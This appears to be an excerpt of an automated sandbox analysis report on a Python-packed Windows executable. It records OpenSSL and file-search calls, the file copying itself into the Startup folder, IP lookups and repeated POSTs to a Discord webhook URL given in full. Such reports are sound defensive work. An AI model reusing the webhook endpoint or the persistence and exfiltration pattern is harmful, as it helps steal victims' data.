Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB8838A0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,	10_2_00007FFBBB8838A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB822590 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,	10_2_00007FFBBB822590
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821B18 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,	10_2_00007FFBBB821B18
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821B31 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	10_2_00007FFBBB821B31
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB87F8F0 CRYPTO_free,CRYPTO_strndup,	10_2_00007FFBBB87F8F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB86E040 CRYPTO_free,	10_2_00007FFBBB86E040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821AB4 CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,	10_2_00007FFBBB821AB4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB82DFB2 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,	10_2_00007FFBBB82DFB2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB82103C CRYPTO_malloc,COMP_expand_block,	10_2_00007FFBBB82103C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB854000 CRYPTO_realloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,	10_2_00007FFBBB854000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB82236F CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	10_2_00007FFBBB82236F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB822027 CRYPTO_free,	10_2_00007FFBBB822027
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821AC3 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,	10_2_00007FFBBB821AC3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB891F70 CRYPTO_memcmp,	10_2_00007FFBBB891F70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821EDD CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,_time64,memcpy,EVP_MD_get0_name,EVP_MD_is_a,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,	10_2_00007FFBBB821EDD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821D8E EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_MAC_init,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,	10_2_00007FFBBB821D8E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB823EB0 CRYPTO_free,	10_2_00007FFBBB823EB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB83BEC0 CRYPTO_free,CRYPTO_memdup,	10_2_00007FFBBB83BEC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB82DEC0 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	10_2_00007FFBBB82DEC0

Source: HyZh4pn0RF.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1834045763.00007FFBAAFF4000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1484383476.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: HyZh4pn0RF.exe, 00000002.00000002.1833413719.00007FFBAAB31000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: HyZh4pn0RF.exe, 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469946066.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1468353119.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843680018.00007FFBBCD53000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: HyZh4pn0RF.exe, 00000002.00000002.1833413719.00007FFBAAA99000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: HyZh4pn0RF.exe, 00000000.00000003.1468353119.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843680018.00007FFBBCD53000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1833413719.00007FFBAAB31000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469859239.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1468754068.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1483438477.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1842850909.00007FFBBC153000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1843366024.00007FFBBC261000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469615826.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1839349243.00007FFBB4C47000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841899584.00007FFBBB37C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841121010.00007FFBBAE72000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1468851780.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1840833630.00007FFBB7FB8000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1838082520.00007FFBAB6F2000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470060822.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1842565303.00007FFBBBE93000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841899584.00007FFBBB37C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469009173.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470676625.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843136590.00007FFBBC244000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470135236.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841637269.00007FFBBAF59000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: HyZh4pn0RF.exe, 00000000.00000003.1470676625.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843136590.00007FFBBC244000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: HyZh4pn0RF.exe, 00000000.00000003.1468754068.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1838782626.00007FFBAB7ED000.00000002.00000001.01000000.0000000F.sdmp

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4888D0 FindFirstFileExW,FindClose,	0_2_00007FF78F4888D0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F497E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF78F497E4C
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F497E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF78F497E4C
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4A1EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF78F4A1EE4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769337E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	9_2_00007FF769337E4C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF7693288D0 FindFirstFileExW,FindClose,	9_2_00007FF7693288D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769341EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	9_2_00007FF769341EE4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769337E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	9_2_00007FF769337E4C

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: Joe Sandbox View	IP Address: 162.159.136.232 162.159.136.232
Source: Joe Sandbox View	IP Address: 45.112.123.126 45.112.123.126
Source: Joe Sandbox View	IP Address: 159.89.102.253 159.89.102.253
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 431Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 649Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1Accept-Encoding: identityContent-Length: 647Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
